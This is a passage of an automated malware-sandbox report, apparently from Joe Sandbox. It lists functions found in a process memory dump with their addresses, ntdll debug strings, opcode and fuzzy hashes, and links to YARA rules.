                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                • API String ID: 0-484625025
                                                                                • Opcode ID: 6304d839b0db6bd4c4aca3441b456dd2969fb613515b356e6fb37d24dc7245e9
                                                                                • Instruction ID: c65aa27392f8264f2cd247678b08e995db8fe4e47b0e98039a025815aea2358b
                                                                                • Opcode Fuzzy Hash: 6304d839b0db6bd4c4aca3441b456dd2969fb613515b356e6fb37d24dc7245e9
                                                                                • Instruction Fuzzy Hash: D4512735A023197ADF21EBA4DC85FFEB7B8AF48B40F0404A9D505AB181E771AA41CF65
                                                                                Function 03116940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                • Instruction ID: aac6dc1db59654f95c0f44bbe66a90db710adc4c3f71f05ef9def85ae8aa3665
                                                                                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                • Instruction Fuzzy Hash: AB022675609341AFC705DF18C890AAFBBE5EFC8700F058A2DF9859B264DB32E915CB42
                                                                                Function 0308B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: +$-$0$0
                                                                                • API String ID: 1302938615-699404926
                                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                • Instruction ID: 2fcc79123f9c29c3eaccee3e052cbd296d2f1f1caaaaf5c87cf0167e7c924a28
                                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                • Instruction Fuzzy Hash: 2981AD70E072499BDF24EF68C8917FEBBE6AF45320F1C465AD8E1A7390C6389851CB54
                                                                                Function 030F20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: %%%u$[$]:%u
                                                                                • API String ID: 48624451-2819853543
                                                                                • Opcode ID: 59bc8f069edb495148c5d5bc7e60907153b7db3f623d0601411c5f997b4ab086
                                                                                • Instruction ID: 82481a4518b53b8abe642f7933a50c2e9039084d8b4264b43f33057ef3e79e87
                                                                                • Opcode Fuzzy Hash: 59bc8f069edb495148c5d5bc7e60907153b7db3f623d0601411c5f997b4ab086
                                                                                • Instruction Fuzzy Hash: 6221537AA02219AFDB10EF69CC50AEFB7ECAF94640F480556EA45D7600E730D9418BA5
                                                                                Function 0306F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 030B02BD
                                                                                • RTL: Re-Waiting, xrefs: 030B031E
                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 030B02E7
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                • API String ID: 0-2474120054
                                                                                • Opcode ID: e6304f1a3061227e1cbda0113ebaed9f439ff8586e7391168c0236150ba6661b
                                                                                • Instruction ID: e1d296a7cea1f5a6be3b032532bf10ce88b979b2b869c5adc5c7495273a13a88
                                                                                • Opcode Fuzzy Hash: e6304f1a3061227e1cbda0113ebaed9f439ff8586e7391168c0236150ba6661b
                                                                                • Instruction Fuzzy Hash: CCE1DD3060A7429FD724CF28D884B6BB7E4BF88724F184A6DF4A58B2E1D774D944CB52
                                                                                Function 0307BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • RTL: Resource at %p, xrefs: 030B7B8E
                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 030B7B7F
                                                                                • RTL: Re-Waiting, xrefs: 030B7BAC
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 0-871070163
                                                                                • Opcode ID: 389fd9dc18faf80078d5eb00890d8fa2b9a5f885e8f6b24f7e78ffff9da43d87
                                                                                • Instruction ID: a44616b31935cac2e112dcd99bf4d4e3a069bb8fea659ffc60dee34e9602a723
                                                                                • Opcode Fuzzy Hash: 389fd9dc18faf80078d5eb00890d8fa2b9a5f885e8f6b24f7e78ffff9da43d87
                                                                                • Instruction Fuzzy Hash: CE41E3357067069FC724DE25C840BAAB7E5EF89B10F040A1DF856DB280DB71E5068B95
                                                                                Function 0307B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 030B728C
                                                                                Strings
                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 030B7294
                                                                                • RTL: Resource at %p, xrefs: 030B72A3
                                                                                • RTL: Re-Waiting, xrefs: 030B72C1
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 885266447-605551621
                                                                                • Opcode ID: bf565c916d5eef825ff4e9fb0c4716c952969c1956a661eb5999dedc89bd4d36
                                                                                • Instruction ID: 871e2827c574853a166c1d588aff62b0cc7c15c9c249dee788de12f645f5870b
                                                                                • Opcode Fuzzy Hash: bf565c916d5eef825ff4e9fb0c4716c952969c1956a661eb5999dedc89bd4d36
                                                                                • Instruction Fuzzy Hash: B441CE35B02306ABC720DF25CC41BAAB7F5FF84B10F180A19F995AB640DB21E8528BD5
                                                                                Function 030F2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: %%%u$]:%u
                                                                                • API String ID: 48624451-3050659472
                                                                                • Opcode ID: 77ca35e1f67eee517b6a909c7d8cce482a5d5d5fd69537661d80d54587e8da60
                                                                                • Instruction ID: ed54d229eb7b8e7816db092102190dae2f67e71ce9a503873153cd4f1d9a00e2
                                                                                • Opcode Fuzzy Hash: 77ca35e1f67eee517b6a909c7d8cce482a5d5d5fd69537661d80d54587e8da60
                                                                                • Instruction Fuzzy Hash: 76319A7AA016199FDB60DF29CC40BEFB7FCEF44610F454996E949D7200EB30DA448B60
                                                                                Function 03087D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: +$-
                                                                                • API String ID: 1302938615-2137968064
                                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                • Instruction ID: 6841aaead110e8d10cf911dbf0b6bd318d155b0316eaeb573782596f226ab168
                                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                • Instruction Fuzzy Hash: E991A771E022199BDB64EF59C8807BEB7F5AF44B20F78451AE8E5E72D9DB3099408B10
                                                                                Function 03049126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $$@
                                                                                • API String ID: 0-1194432280
                                                                                • Opcode ID: e84832fc2a8a4b4ffd4bc4adb0ccea0610ae8e45cc723e7609d51af5a2f904ae
                                                                                • Instruction ID: 937c96f980ae167e920cf867d83787ef5975a08e2da2ac4af8fefa7234f2682a
                                                                                • Opcode Fuzzy Hash: e84832fc2a8a4b4ffd4bc4adb0ccea0610ae8e45cc723e7609d51af5a2f904ae
                                                                                • Instruction Fuzzy Hash: 29813DB5D022699BDB35DB98CC44BEEB7B8AF48750F0445EAE909B7250D7305E80CFA0